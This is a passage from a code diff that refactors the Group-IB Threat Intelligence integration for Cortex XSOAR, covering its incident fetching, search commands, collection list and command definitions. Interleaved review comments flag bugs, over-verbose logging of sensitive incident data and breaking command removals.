)] - return result_dict, additional_tables +""" Commands """ - elif isinstance(result, str | int | float) or result is None: - if not is_inside_list: - result_dict.update({previous_keys: result}) - else: - result_dict.update({previous_keys: [result]}) - return result_dict, additional_tables - return None +def test_module(client: Client) -> str: + """ + Returning 'ok' indicates that the integration works like it is supposed to. Connection to the service is successful. 
+ + :param client: GIB_TI client + :return: 'ok' if test passed, anything else will fail the test. + """ + test = client.poller.get_available_collections() + if len(test) == 0: + return "There are no collections available" + return "ok" -""" Commands """ +def collection_availability_check(client: Client, collection_name: str) -> None: + if collection_name not in client.poller.get_available_collections(): + raise Exception( + f"Collection {collection_name} is not available from you, " + "please disable collection on it or contact Group-IB to grant access" + ) -def fetch_incidents_command(client: Client, last_run: dict, first_fetch_time: str, - incident_collections: list, requests_count: int) -> tuple[dict, list]: +def fetch_incidents_command( + client: Client, + last_run: dict, + first_fetch_time: str, + incident_collections: list[str], + max_requests: int, + hunting_rules: int, +) -> tuple[dict, list]: """ This function will execute each interval (default is 1 minute). 
@@ -1030,78 +2100,76 @@ def fetch_incidents_command(client: Client, last_run: dict, first_fetch_time: st :param last_run: the greatest sequpdate we fetched from last fetch. :param first_fetch_time: if last_run is None then fetch all incidents since first_fetch_time. :param incident_collections: list of collections enabled by client. - :param requests_count: count of requests to API per collection. + :param max_requests: count of requests to API per collection. + :param hunting_rules: enable this parameter to collect using hunting rules :return: next_run will be last_run in the next fetch-incidents; incidents and indicators will be created in Demisto. """ incidents = [] next_run: dict[str, dict[str, int | Any]] = {"last_fetch": {}} - for collection_name in incident_collections: + for collection_name in incident_collections: # noqa: B007 + collection_availability_check(client=client, collection_name=collection_name) + CommonHelpers.validate_collections(collection_name) last_fetch = last_run.get("last_fetch", {}).get(collection_name) + requests_count = 0 + sequpdate = 0 + portions, last_fetch = client.create_poll_generator( + collection_name=collection_name, + hunting_rules=hunting_rules, + last_fetch=last_fetch, + first_fetch_time=first_fetch_time, + ) - portions = client.create_poll_generator(collection_name=collection_name, max_requests=requests_count, - last_fetch=last_fetch, first_fetch_time=first_fetch_time) - for portion, last_fetch in portions: - for feed in portion: - mapping = MAPPING.get(collection_name, {}) - if collection_name == "compromised/breached": - feed.update({"name": mapping.get("prefix", "") + ": " + ', '.join( - find_element_by_key(feed, mapping.get("name")))}) - else: - feed.update({"name": mapping.get("prefix", "") + ": " + str( - find_element_by_key(feed, mapping.get("name")))}) - - feed.update({"gibType": collection_name}) - - severity = feed.get("evaluation", {}).get("severity") - system_severity = 0 - if severity == "green": - 
system_severity = 1 - elif severity == "orange": - system_severity = 2 - elif severity == "red": - system_severity = 3 - - related_indicators_data = [] - indicators_info = MAPPING.get(collection_name, {}).get("indicators", []) - for i in indicators_info: - if find_element_by_key(feed, i["main_field"]) is not None: - related_indicators_data.append(find_element_by_key(feed, i["main_field"])) - - incident_created_time = dateparser.parse(feed.get(mapping.get("date"))) - assert incident_created_time is not None - feed.update({"relatedIndicatorsData": related_indicators_data}) - feed.update({"systemSeverity": system_severity}) - if collection_name in ["osi/git_repository", "osi/public_leak", "bp/phishing_kit"]: - feed = transform_some_fields_into_markdown(collection_name, feed) - incident = { - "name": feed["name"], - "occurred": incident_created_time.strftime(DATE_FORMAT), - "rawJSON": json.dumps(feed) - } - incidents.append(incident) + mapping = MAPPING.get(collection_name, {}) + for portion in portions: + sequpdate = portion.sequpdate + new_parsed_json = portion.bulk_parse_portion( + keys_list=[mapping], as_json=False + ) + if isinstance(new_parsed_json, list): + for i in new_parsed_json: + for incident in i: + constructed_incident = IncidentBuilder( + collection_name=collection_name, + incident=incident, + mapping=mapping, + ).build_incident() + incidents.append(constructed_incident) + else: + raise Exception("new_parsed_json in portion should not be a string") + + requests_count += 1 + if requests_count > max_requests: + break + + if collection_name == "compromised/breached": + next_run["last_fetch"][collection_name] = last_fetch - next_run["last_fetch"][collection_name] = last_fetch + next_run["last_fetch"][collection_name] = sequpdate return next_run, incidents -def get_available_collections_command(client: Client): +def get_available_collections_command(client: Client, args: dict | None = None): """ Returns list of available collections to context and War Room. 
:param client: GIB_TI&A_Feed client. """ - result, buffer_list = client.get_available_collections() - readable_output = tableToMarkdown(name="Available collections", t=result, headers="collections") + my_collections = client.get_available_collections_proxy_function() + readable_output = tableToMarkdown( + name="Available collections", + t={"collections": my_collections}, + headers="collections", + ) return CommandResults( outputs_prefix="GIBTIA.OtherInfo", outputs_key_field="collections", - outputs=result, + outputs={"collections": my_collections}, readable_output=readable_output, ignore_auto_extract=True, - raw_response=buffer_list + raw_response=my_collections, ) @@ -1110,7 +2178,9 @@ def get_info_by_id_command(collection_name: str): Decorator around actual commands, that returns command depends on `collection_name`. """ - def get_info_by_id_for_collection(client: Client, args: dict) -> list[CommandResults]: + def get_info_by_id_for_collection( + client: Client, args: dict + ) -> list[CommandResults]: """ This function returns additional information to context and War Room. 
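Review bot: The per-collection cursor written at the end of the fetch loop is wrong in two places. The `if collection_name == "compromised/breached": next_run["last_fetch"][collection_name] = last_fetch` branch is dead, because the unconditional `next_run["last_fetch"][collection_name] = sequpdate` on the next line overwrites it; if breached is meant to keep `last_fetch`, the second assignment should be that branch's `else:`. `sequpdate` is initialised to `0` and only updated inside `for portion in portions`, so a poll that yields no portions resets the stored cursor to `0` and the next fetch re-ingests that collection from the beginning — initialise it from the previous cursor or skip the write when no portion was seen. Separately, `if requests_count > max_requests: break` runs after the portion has already been consumed, so `max_requests + 1` requests are issued per collection; `if requests_count >= max_requests: break` matches the documented meaning. fetch_incidents_command's signature and docstring begin in the previous hunk.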
@@ -1118,52 +2188,25 @@ def get_info_by_id_for_collection(client: Client, args: dict) -> list[CommandRes :param args: arguments, provided by client. """ results = [] - coll_name = collection_name - id_ = str(args.get("id")) - - if coll_name in ["threat", "threat_actor"]: - flag = args.get("isAPT") - if flag: - coll_name = "apt/" + coll_name - else: - coll_name = "hi/" + coll_name - result = client.search_feed_by_id(coll_name, id_) - if "displayOptions" in result: - del result["displayOptions"] + CommonHelpers.validate_collections(collection_name) + feed, main_table_data, additional_tables, indicators, readable_output = ( + BuilderCommandResponses( + client=client, collection_name=collection_name, args=args + ).build_feed() + ) - else: - result = client.search_feed_by_id(coll_name, id_) - if "isFavourite" in result: - del result["isFavourite"] - if "isHidden" in result: - del result["isHidden"] - - if "seqUpdate" in result: - del result["seqUpdate"] - - indicators: list[CommandResults] = [] - if coll_name not in ["apt/threat_actor", "hi/threat_actor"]: - indicators = find_iocs_in_feed(result, coll_name) - - if coll_name in ["apt/threat", "hi/threat"]: - del result["indicatorMalwareRelationships"], result["indicatorRelationships"], \ - result["indicatorToolRelationships"], result["indicatorsIds"], \ - result["indicators"] - - if coll_name == "compromised/breached": - if "updateTime" in result: - del result["updateTime"] - main_table_data, additional_tables = result, [] - else: - main_table_data, additional_tables = transform_function(result) - results.append(CommandResults( - outputs_prefix="GIBTIA.{}".format(MAPPING.get(coll_name, {}).get("prefix", "").replace(" ", "")), - outputs_key_field="id", - outputs=result, - readable_output=get_human_readable_feed(collection_name, main_table_data), - raw_response=result, - ignore_auto_extract=True - )) + results.append( + CommandResults( + outputs_prefix="GIBTIA.{}".format( + PREFIXES.get(collection_name, "").replace(" ", 
"") + ), + outputs_key_field="id", + outputs=feed, + readable_output=readable_output, + raw_response=feed, + ignore_auto_extract=True, + ) + ) results.extend(additional_tables) results.extend(indicators) return results 
@@ -1171,129 +2214,174 @@ def get_info_by_id_for_collection(client: Client, args: dict) -> list[CommandRes return get_info_by_id_for_collection -def global_search_command(client: Client, args: dict): - query = str(args.get('query')) - raw_response = client.search_by_query(query) +def global_search_command(client: Client, args: dict) -> CommandResults: + query = str(args.get("query")) + raw_response = client.search_proxy_function(query=query) handled_list = [] for result in raw_response: - if result.get('apiPath') in MAPPING: - handled_list.append({'apiPath': result.get('apiPath'), 'count': result.get('count'), - 'GIBLink': result.get('link'), - 'query': result.get('apiPath') + '?q=' + query}) + if result.get("apiPath") in MAPPING: + apiPath = result.get("apiPath") + handled_list.append( + { + "apiPath": apiPath, + "count": result.get("count"), + "GIBLink": result.get("link"), + "query": f"{apiPath}?q={query}", + } + ) if len(handled_list) != 0: results = CommandResults( outputs_prefix="GIBTIA.search.global", outputs_key_field="query", outputs=handled_list, - readable_output=tableToMarkdown('Search results', t=handled_list, - headers=['apiPath', 'count', 'GIBLink'], - url_keys=['GIBLink']), + readable_output=tableToMarkdown( + "Search results", + t=handled_list, + headers=["apiPath", "count", "GIBLink"], + url_keys=["GIBLink"], + ), raw_response=raw_response, - ignore_auto_extract=True + ignore_auto_extract=True, ) else: results = CommandResults( raw_response=raw_response, ignore_auto_extract=True, outputs=[], - readable_output="Did not find anything for your query :(" + readable_output="Did not find anything for your query :(", ) return results def local_search_command(client: Client, args: dict): - query, date_from, date_to = args.get('query'), args.get('date_from', None), args.get('date_to', None) - collection_name = str(args.get('collection_name')) + query, date_from, date_to = ( + args.get("query"), + args.get("date_from", None), + args.get("date_to", None), + 
) + collection_name = str(args.get("collection_name")) + CommonHelpers.validate_collections(collection_name) + date_from_parsed = ( + CommonHelpers.date_parse(date=date_from, arg_name="date_from") + if date_from is not None + else date_from + ) + date_to_parsed = ( + CommonHelpers.date_parse(date=date_to, arg_name="date_to") + if date_to is not None + else date_to + ) - if date_from is not None: - date_from_parsed = dateparser.parse(date_from) - if date_from_parsed is None: - raise DemistoException('Inappropriate date_from format, ' - 'please use something like this: 2020-01-01 or January 1 2020') - date_from_parsed = date_from_parsed.strftime('%Y-%m-%dT%H:%M:%SZ') - else: - date_from_parsed = date_from # type: ignore - if date_to is not None: - date_to_parsed = dateparser.parse(date_to) - if date_to_parsed is None: - raise DemistoException('Inappropriate date_to format, ' - 'please use something like this: 2020-01-01 or January 1 2020') - date_to_parsed = date_to_parsed.strftime('%Y-%m-%dT%H:%M:%SZ') - else: - date_to_parsed = date_to # type: ignore + portions = client.poller.create_search_generator( + collection_name=collection_name, + query=query, + date_from=date_from_parsed, + date_to=date_to_parsed, + ) + mapping = MAPPING.get(collection_name, {}) - portions = client.create_manual_generator(collection_name=collection_name, query=query, - date_from=date_from_parsed, date_to=date_to_parsed) result_list = [] - name = MAPPING.get(collection_name, {}).get('name') for portion in portions: - for feed in portion: - add_info = None + new_parsed_json = portion.parse_portion(keys=mapping, as_json=False) + for feed in new_parsed_json: + name = feed.get("name", None) if name is not None: - add_info = name + ": " + str(find_element_by_key(feed, name)) - result_list.append({'id': feed.get('id'), 'additional_info': add_info}) + name = f"Name: {name}" + result_list.append({"id": feed.get("id"), "additional_info": name}) results = CommandResults( 
outputs_prefix="GIBTIA.search.local", outputs_key_field="id", outputs=result_list, - readable_output=tableToMarkdown('Search results', t=result_list, - headers=['id', 'additional_info']), - ignore_auto_extract=True + readable_output=tableToMarkdown( + "Search results", t=result_list, headers=["id", "additional_info"] + ), + ignore_auto_extract=True, ) return results def main(): """ - PARSE AND VALIDATE INTEGRATION PARAMS + PARSE AND VALIDATE INTEGRATION PARAMS """ - params = demisto.params() - username = params.get("credentials").get("identifier") - password = params.get("credentials").get("password") - base_url = str(params.get("url")) - proxy = params.get("proxy", False) - verify_certificate = not params.get("insecure", False) - - incident_collections = params.get("incident_collections", []) - incidents_first_fetch = params.get("first_fetch", "3 days").strip() - requests_count = int(params.get("max_fetch", 3)) - - args = demisto.args() - command = demisto.command() - LOG(f"Command being called is {command}") + incident_collections = None try: + params = demisto.params() + credentials: dict = params.get("credentials", {}) + username = credentials.get("identifier") + password = credentials.get("password") + base_url = str(params.get("url")) + proxy = params.get("proxy", False) + hunting_rules = params.get("hunting_rules", 0) + verify_certificate = not params.get("insecure", False) + endpoint = None + + incident_collections = params.get("incident_collections", []) + incidents_first_fetch = params.get("first_fetch", "3 days").strip() + requests_count = int(params.get("max_fetch", 3)) + + args = demisto.args() + command = demisto.command() + LOG(f"Command being called is {command}") + client = Client( base_url=base_url, verify=verify_certificate, auth=(username, password), proxy=proxy, - headers={"Accept": "*/*"} + headers={"Accept": "*/*"}, ) + demisto.info("client getted") + + deprecated_comands = [ + "gibtia-get-compromised-card-info", + 
"gibtia-get-compromised-imei-info", + "gibtia-get-malware-targeted-malware-info", + "gibtia-get-phishing-info", + ] + if command in deprecated_comands: + raise Exception(f"{command} deprecated") + + if hunting_rules is True: + hunting_rules = 1 + list_hunting_rules_collections = ( + client.poller.get_hunting_rules_collections() + ) + + for collection in incident_collections: + if collection not in list_hunting_rules_collections: + raise Exception( + f"Collection {collection} Does't support hunting rules" + ) + + info_comands = { + "gibtia-get-compromised-account-info": "compromised/account_group", + "gibtia-get-compromised-card-group-info": "compromised/bank_card_group", + "gibtia-get-compromised-mule-info": "compromised/mule", + "gibtia-get-compromised-breached-info": "compromised/breached", + "gibtia-get-phishing-kit-info": "attacks/phishing_kit", + "gibtia-get-phishing-group-info": "attacks/phishing_group", + "gibtia-get-osi-git-leak-info": "osi/git_repository", + "gibtia-get-osi-public-leak-info": "osi/public_leak", + "gibtia-get-osi-vulnerability-info": "osi/vulnerability", + "gibtia-get-attacks-ddos-info": "attacks/ddos", + "gibtia-get-attacks-deface-info": "attacks/deface", + "gibtia-get-threat-info": "threat", + "gibtia-get-threat-actor-info": "threat_actor", + "gibtia-get-suspicious-ip-tor-node-info": "suspicious_ip/tor_node", + "gibtia-get-suspicious-ip-open-proxy-info": "suspicious_ip/open_proxy", + "gibtia-get-suspicious-ip-socks-proxy-info": "suspicious_ip/socks_proxy", + "gibtia-get-suspicious-ip-vpn-info": "suspicious_ip/vpn", + "gibtia-get-suspicious-ip-scanner-info": "suspicious_ip/scanner", + "gibtia-get-malware-cnc-info": "malware/cnc", + "gibtia-get-malware-malware-info": "malware/malware", + } - commands = { - "gibtia-get-compromised-account-info": get_info_by_id_command("compromised/account_group"), - "gibtia-get-compromised-card-info": get_info_by_id_command("compromised/card"), - "gibtia-get-compromised-mule-info": 
get_info_by_id_command("compromised/mule"), - "gibtia-get-compromised-imei-info": get_info_by_id_command("compromised/imei"), - "gibtia-get-compromised-breached-info": get_info_by_id_command("compromised/breached"), - "gibtia-get-phishing-kit-info": get_info_by_id_command("attacks/phishing_kit"), - "gibtia-get-phishing-info": get_info_by_id_command("attacks/phishing"), - "gibtia-get-osi-git-leak-info": get_info_by_id_command("osi/git_repository"), - "gibtia-get-osi-public-leak-info": get_info_by_id_command("osi/public_leak"), - "gibtia-get-osi-vulnerability-info": get_info_by_id_command("osi/vulnerability"), - "gibtia-get-attacks-ddos-info": get_info_by_id_command("attacks/ddos"), - "gibtia-get-attacks-deface-info": get_info_by_id_command("attacks/deface"), - "gibtia-get-threat-info": get_info_by_id_command("threat"), - "gibtia-get-threat-actor-info": get_info_by_id_command("threat_actor"), - "gibtia-get-suspicious-ip-tor-node-info": get_info_by_id_command("suspicious_ip/tor_node"), - "gibtia-get-suspicious-ip-open-proxy-info": get_info_by_id_command("suspicious_ip/open_proxy"), - "gibtia-get-suspicious-ip-socks-proxy-info": get_info_by_id_command("suspicious_ip/socks_proxy"), - "gibtia-get-malware-targeted-malware-info": get_info_by_id_command("malware/targeted_malware"), - "gibtia-get-malware-cnc-info": get_info_by_id_command("malware/cnc"), + other_commands = { "gibtia-get-available-collections": get_available_collections_command, "gibtia-global-search": global_search_command, - "gibtia-local-search": local_search_command + "gibtia-local-search": local_search_command, } if command == "test-module": 
@@ -1303,18 +2391,33 @@ def main(): elif command == "fetch-incidents": # Set and define the fetch incidents command to run after activated via integration settings. - next_run, incidents = fetch_incidents_command(client=client, last_run=demisto.getLastRun(), - first_fetch_time=incidents_first_fetch, - incident_collections=incident_collections, - requests_count=requests_count) + next_run, incidents = fetch_incidents_command( + client=client, + last_run=demisto.getLastRun(), + first_fetch_time=incidents_first_fetch, + incident_collections=incident_collections, + max_requests=requests_count, + hunting_rules=hunting_rules, + ) + demisto.info(f"{str(incidents)}") demisto.setLastRun(next_run) demisto.incidents(incidents) else: - return_results(commands[command](client, args)) + incident_collections = None + if command in info_comands: + endpoint = info_comands[command] + result = get_info_by_id_command(endpoint)(client, args) + else: + result = other_commands[command](client, args) # type: ignore + return_results(result) # Log exceptions - except Exception as e: - return_error(f"Failed to execute {demisto.command()} command. Error: {str(e)}") + except Exception: + return_error( + f"Failed to execute {demisto.command()} command.\n" + f"Incident collection: {incident_collections}.\n" + f"Command endpoint: {endpoint}.\n Error: {format_exc()}" + ) if __name__ in ("__main__", "__builtin__", "builtins"): diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/GroupIBTIA.yml b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/GroupIBTIA.yml index 17f7ed55a097..f2464006d9ab 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/GroupIBTIA.yml +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/GroupIBTIA.yml 
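Review bot: `demisto.info(f"{str(incidents)}")` writes every fetched incident, including its full `rawJSON`, to the integration log at info level; the compromised-account and bank-card collections this integration ingests carry credential and payment-card data, so the log becomes a second copy of that data outside the incident's access controls. Log the count instead, `demisto.info(f"Fetched {len(incidents)} incidents")`, and leave record inspection to `demisto.debug` if it is needed at all. The new `except Exception` handler now returns `format_exc()` to the War Room where `str(e)` was returned before, so the full traceback and any request detail it contains become user-visible; keeping the traceback in `demisto.error` and returning the short message preserves the diagnostics without widening exposure. `main` begins in the previous hunk.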
@@ -14,8 +14,7 @@ configuration: name: credentials required: true type: 9 -- additionalinfo: Whether to allow connections without verifying SSL certificates - validity. +- additionalinfo: Whether to allow connections without verifying SSL certificates validity. display: Trust any certificate (not secure) name: insecure required: false @@ -35,13 +34,27 @@ configuration: name: incident_collections options: - compromised/account_group - - compromised/card + - compromised/bank_card_group - compromised/breached - - bp/phishing - - bp/phishing_kit + - compromised/mule - osi/git_repository - osi/public_leak - - malware/targeted_malware + - osi/vulnerability + - attacks/ddos + - attacks/deface + - attacks/phishing_group + - attacks/phishing_kit + - suspicious_ip/tor_node + - suspicious_ip/open_proxy + - suspicious_ip/socks_proxy + - suspicious_ip/vpn + - suspicious_ip/scanner + - malware/cnc + - malware/malware + - hi/threat + - hi/threat_actor + - apt/threat_actor + - apt/threat required: false type: 16 - additionalinfo: Date to start fetching incidents from. @@ -51,9 +64,7 @@ configuration: name: first_fetch required: false type: 0 -- additionalinfo: A number of requests per collection that integration sends in one - fetch iteration (each request picks up to 200 incidents). If you face some runtime - errors, lower the value. +- additionalinfo: A number of requests per collection that integration sends in one fetch iteration (each request picks up to 200 incidents). If you face some runtime errors, lower the value. defaultvalue: '3' display: Number of requests per collection hidden: false 
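Review bot: In the `incident_collections` hunk the values `compromised/card`, `bp/phishing`, `bp/phishing_kit` and `malware/targeted_malware` are removed and differently named collections (`compromised/bank_card_group`, `attacks/phishing_group`, `malware/malware`) take their place, so an existing instance that has the old values saved will keep submitting names the new code may not recognise. Unless the Python side maps the legacy names (not visible here), the parameter's `additionalinfo` should state which collections were renamed and that the selection has to be re-saved after the upgrade. The same renames appear in the `collection_name` predefined list of `gibtia-local-search` later in this file.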
@@ -70,43 +81,25 @@ configuration: name: incidentType required: false type: 13 -description: "Pack helps to integrate Group-IB Threat Intelligence and get incidents\ - \ directly into Cortex XSOAR. \nThe list of included collections: \nCompromised\ - \ Accounts, Compromised Cards, Brand Protection Phishing, Brand Protection Phishing\ - \ Kit, OSI Git Leak, OSI Public Leak, Targeted Malware." -detaileddescription: "### Group-IB Threat Intelligence\n \n \n- This section explains\ - \ how to configure the instance of Threat Intelligence in Cortex XSOAR. \n \n\ - 1. Open Group-IB TI web interface. (It may be either new interface: [https://tap.group-ib.com](https://tap.group-ib.com))\ - \ \n2. To generate API key(password): \n2.1. In the new interface: click on your\ - \ name in the right upper corner -> choose **Profile** option -> switch to **Security\ - \ and Access** tab -> click **Personal token** -> follow instructions to generate\ - \ API token. \n3. Your server URL is the same as your TI web interface URL. \n\ - 4. Your username is the email that you use to enter in the web interface.\n5. Set\ - \ classifier and mapper with Group-IB Threat Intelligence classifier and mapper\ - \ or with our own if you want so.\n6. Go to Settings->Integrations->Pre-Processing\ - \ Rules and set up the pre-processing rule:\n* Set up conditions: \"gibid Is not\ - \ empty (General)\" and \"Type Doesn't equal(String) GIB Data Breach\".\n* Action:\ - \ \"Run a script\".\n* Script: \"GIBIncidentUpdate\" (will recreate closed incidents\ - \ if they get an update, in other cases will update the existing one) or \"GIBIncidentUpdateIncludingClosed\"\ - (will only update incidents). \n7. Don't forget to contact Group-IB to add to allow\ - \ list your Cortex IP or public IP of a proxy that you are using with Cortex." 
+- display: Hunting Rules + name: hunting_rules + defaultvalue: "false" + type: 8 + required: false + additionalinfo: To enable the collection of data using hunting rules, please select this parameter. +description: "Pack helps to integrate Group-IB Threat Intelligence and get incidents directly into Cortex XSOAR. \nThe list of included collections: \nCompromised Accounts, Compromised Cards, Brand Protection Phishing, Brand Protection Phishing Kit, OSI Git Leak, OSI Public Leak, Targeted Malware." +detaileddescription: "### Group-IB Threat Intelligence\n \n \n- This section explains how to configure the instance of Threat Intelligence in Cortex XSOAR. \n \n1. Open Group-IB TI web interface. (It may be either new interface: [https://tap.group-ib.com](https://tap.group-ib.com)) \n2. To generate API key(password): \n2.1. In the new interface: click on your name in the right upper corner -> choose **Profile** option -> switch to **Security and Access** tab -> click **Personal token** -> follow instructions to generate API token. \n3. Your server URL is the same as your TI web interface URL. \n4. Your username is the email that you use to enter in the web interface.\n5. Set classifier and mapper with Group-IB Threat Intelligence classifier and mapper or with our own if you want so.\n6. Go to Settings->Integrations->Pre-Processing Rules and set up the pre-processing rule:\n* Set up conditions: \"gibid Is not empty (General)\" and \"Type Doesn't equal(String) GIB Data Breach\".\n* Action: \"Run a script\".\n* Script: \"GIBIncidentUpdate\" (will recreate closed incidents if they get an update, in other cases will update the existing one) or \"GIBIncidentUpdateIncludingClosed\"(will only update incidents). \n7. Don't forget to contact Group-IB to add to allow list your Cortex IP or public IP of a proxy that you are using with Cortex." 
display: Group-IB Threat Intelligence name: Group-IB Threat Intelligence & Attribution script: commands: - arguments: - - default: false - description: |- + - description: |- GIB event id. e.g.: 253b9a136f0d574149fc43691eaf7ae27aff141a. - isArray: false name: id required: true - secret: false - deprecated: false - description: Command performs Group IB event lookup in compromised/account collection - with provided ID. - execution: false + description: Command performs Group IB event lookup in compromised/account collection with provided ID. name: gibtia-get-compromised-account-info outputs: - contextPath: GIBTIA.CompromisedAccount.client.ipv4.asn 
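Review bot: The reflowed `description` still lists the collections as `Compromised Accounts, Compromised Cards, Brand Protection Phishing, Brand Protection Phishing Kit, OSI Git Leak, OSI Public Leak, Targeted Malware`, which no longer matches the `incident_collections` options this patch ships (the `bp/*` and `malware/targeted_malware` entries are gone; mule, vulnerability, ddos, deface, `suspicious_ip/*`, `malware/cnc`, `malware/malware`, `hi/*` and `apt/*` are added), so the text shown to the user is stale at the moment it is being rewritten. Deriving that sentence from the options list, or replacing it with `The list of included collections is available in the Incident collections parameter.`, keeps the two in step. The `hunting_rules` `additionalinfo` is phrased as a request (`please select this parameter`); a statement of what the flag changes in the fetch is the usual form, though its effect is only visible on the Python side.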
@@ -179,101 +172,16 @@ script: description: Event severity. type: String - arguments: - - default: false - description: |- - GIB event id. - e.g.: ecda6f4dc85596f447314ce01e2152db9c9d3cbc. - isArray: false - name: id - required: true - secret: false - deprecated: false - description: Command performs Group IB event lookup in compromised/card collection - with provided ID. - execution: false - name: gibtia-get-compromised-card-info - outputs: - - contextPath: GIBTIA.CompromisedCard.cardInfo.cvv - description: Compromised card CVV. - type: String - - contextPath: GIBTIA.CompromisedCard.cardInfo.issuer.issuer - description: Card issuer. - type: String - - contextPath: GIBTIA.CompromisedCard.cardInfo.number - description: Compromised card number. - type: String - - contextPath: GIBTIA.CompromisedCard.cardInfo.system - description: Payment system. - type: String - - contextPath: GIBTIA.CompromisedCard.cardInfo.type - description: Internal issuer card type. - type: String - - contextPath: GIBTIA.CompromisedCard.cardInfo.validThru - description: Card expiration date. - type: String - - contextPath: GIBTIA.CompromisedCard.client.ipv4.asn - description: Compromised client ASN. - type: String - - contextPath: GIBTIA.CompromisedCard.client.ipv4.countryName - description: Country name. - type: String - - contextPath: GIBTIA.CompromisedCard.client.ipv4.ip - description: Victim IP address. - type: String - - contextPath: GIBTIA.CompromisedCard.client.ipv4.region - description: Region name. - type: String - - contextPath: GIBTIA.CompromisedCard.dateCompromised - description: Date of compromise. - type: Date - - contextPath: GIBTIA.CompromisedCard.dateDetected - description: Date detected. - type: Date - - contextPath: GIBTIA.CompromisedCard.malware.name - description: Related malware name. - type: String - - contextPath: GIBTIA.CompromisedCard.malware.id - description: Related GIB malware ID. 
- type: String - - contextPath: GIBTIA.CompromisedCard.portalLink - description: Link to GIB incident. - type: String - - contextPath: GIBTIA.CompromisedCard.threatActor.name - description: Associated threat actor. - type: String - - contextPath: GIBTIA.CompromisedCard.threatActor.isAPT - description: Is threat actor APT group. - type: Boolean - - contextPath: GIBTIA.CompromisedCard.threatActor.id - description: Threat actor GIB ID. - type: String - - contextPath: GIBTIA.CompromisedCard.id - description: Group IB incident ID. - type: String - - contextPath: GIBTIA.CompromisedCard.sourceType - description: Information source. - type: String - - contextPath: GIBTIA.CompromisedCard.evaluation.severity - description: Event severity. - type: String - - arguments: - - default: false - description: |- + - description: |- GIB event id. e.g.: 50a3b4abbfca5dcbec9c8b3a110598f61ba93r33. - isArray: false name: id required: true - secret: false - deprecated: false - description: Command performs Group IB event lookup in compromised/mule collection - with provided ID. - execution: false + description: Command performs Group IB event lookup in compromised/mule collection with provided ID. name: gibtia-get-compromised-mule-info outputs: - contextPath: GIBTIA.CompromisedMule.account - description: Account number (card/phone), which was used by threat actor to - cash out. + description: Account number (card/phone), which was used by threat actor to cash out. type: String - contextPath: GIBTIA.CompromisedMule.cnc.ipv4.asn description: CNC ASN. 
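Review bot: This hunk deletes the `gibtia-get-compromised-card-info` command outright, and the hunks at `@@ -321,90`, `@@ -580,138` and `@@ -1132,93` do the same for `gibtia-get-compromised-imei-info`, `gibtia-get-phishing-kit-info`, `gibtia-get-phishing-info` and `gibtia-get-malware-targeted-malware-info`; any existing playbook or automation that calls them breaks on upgrade with no hint of the replacement. The conventional path is to keep each entry for one release with `deprecated: true` and a description pointing at its successor (for example `gibtia-get-compromised-card-group-info` for the card command), or at minimum to list the removals as breaking in the release notes.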
@@ -321,90 +229,12 @@ script: description: Event severity. type: String - arguments: - - default: false - description: |- - GIB event id. - e.g.: 0c1426048474df19ada9d0089ef8b3efce906556. - isArray: false - name: id - required: true - secret: false - deprecated: false - description: Command performs Group IB event lookup in compromised/imei collection - with provided ID. - execution: false - name: gibtia-get-compromised-imei-info - outputs: - - contextPath: GIBTIA.CompromisedIMEI.client.ipv4.asn - description: Compromised client ASN. - type: String - - contextPath: GIBTIA.CompromisedIMEI.client.ipv4.countryName - description: Country name. - type: String - - contextPath: GIBTIA.CompromisedIMEI.client.ipv4.ip - description: Victim IP address. - type: String - - contextPath: GIBTIA.CompromisedIMEI.client.ipv4.region - description: Region name. - type: String - - contextPath: GIBTIA.CompromisedIMEI.cnc.domain - description: CNC URL. - type: String - - contextPath: GIBTIA.CompromisedIMEI.cnc.ipv4.asn - description: CNC ASN. - type: String - - contextPath: GIBTIA.CompromisedIMEI.cnc.ipv4.countryName - description: CNC IP country name. - type: String - - contextPath: GIBTIA.CompromisedIMEI.cnc.ipv4.ip - description: CNC IP address. - type: String - - contextPath: GIBTIA.CompromisedIMEI.cnc.ipv4.region - description: CNC region name. - type: String - - contextPath: GIBTIA.CompromisedIMEI.dateCompromised - description: Date compromised. - type: Date - - contextPath: GIBTIA.CompromisedIMEI.dateDetected - description: Date detected. - type: Date - - contextPath: GIBTIA.CompromisedIMEI.device.imei - description: Compromised IMEI. - type: String - - contextPath: GIBTIA.CompromisedIMEI.device.model - description: Compromised device model. - type: String - - contextPath: GIBTIA.CompromisedIMEI.malware.name - description: Associated malware. - type: String - - contextPath: GIBTIA.CompromisedIMEI.threatActor.id - description: Associated threat actor ID. 
- type: String - - contextPath: GIBTIA.CompromisedIMEI.threatActor.name - description: Associated threat actor. - type: String - - contextPath: GIBTIA.CompromisedIMEI.threatActor.isAPT - description: Is threat actor APT group. - type: Boolean - - contextPath: GIBTIA.CompromisedIMEI.id - description: Group IB incident ID. - type: String - - contextPath: GIBTIA.CompromisedIMEI.evaluation.severity - description: Event severity. - type: String - - arguments: - - default: false - description: |- + - description: |- GIB event id. e.g.: 6fd344f340f4bdc08548cb36ded62bdf. - isArray: false name: id required: true - secret: false - deprecated: false - description: Command performs Group IB event lookup in compromised/breached collection - with provided ID. - execution: false + description: Command performs Group IB event lookup in compromised/breached collection with provided ID. name: gibtia-get-compromised-breached-info outputs: - contextPath: GIBTIA.DataBreach.email @@ -426,18 +256,12 @@ script: description: Event severity. type: String - arguments: - - default: false - description: |- + - description: |- GIB event id. e.g.: f201c253ac71f7d78db39fa111a2af9d7ee7a3f7. - isArray: false name: id required: true - secret: false - deprecated: false - description: Command performs Group IB event lookup in osi/git_leak collection - with provided ID. - execution: false + description: Command performs Group IB event lookup in osi/git_leak collection with provided ID. name: gibtia-get-osi-git-leak-info outputs: - contextPath: GIBTIA.GitLeak.dateDetected 
